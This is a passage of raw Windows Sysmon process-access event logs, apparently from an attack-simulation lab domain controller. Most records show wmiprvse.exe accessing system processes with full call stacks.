Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 